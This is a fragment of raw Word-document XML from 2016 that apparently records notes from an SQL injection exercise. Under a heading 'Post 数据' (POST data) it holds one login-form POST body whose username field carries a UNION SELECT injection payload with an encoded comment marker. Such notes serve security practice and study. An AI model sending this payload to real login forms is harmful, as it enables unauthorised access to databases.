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D4" w:rsidRDefault="00945CA1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07C5E9AF" wp14:editId="104428CF">
            <wp:extent cx="5274310" cy="2512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A1" w:rsidRDefault="00945CA1"/>
    <w:p w:rsidR="00945CA1" w:rsidRDefault="00945CA1">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ost 数据</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00945CA1" w:rsidRDefault="00945CA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00945CA1">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00945CA1">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00945CA1">
        <w:t>ddd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00945CA1">
        <w:t>' union select 1,2%20%23&amp;passwd=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00945CA1">
        <w:t>fds&amp;submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00945CA1">
        <w:t>=Submit</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00945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F7"/>
    <w:rsid w:val="00750ED4"/>
    <w:rsid w:val="008077F7"/>
    <w:rsid w:val="0094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343D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3E9EDB63-A737-44A9-9BEC-4ABB94C3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>Microsoft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李文致</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>李文致</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-18T02:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-18T02:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>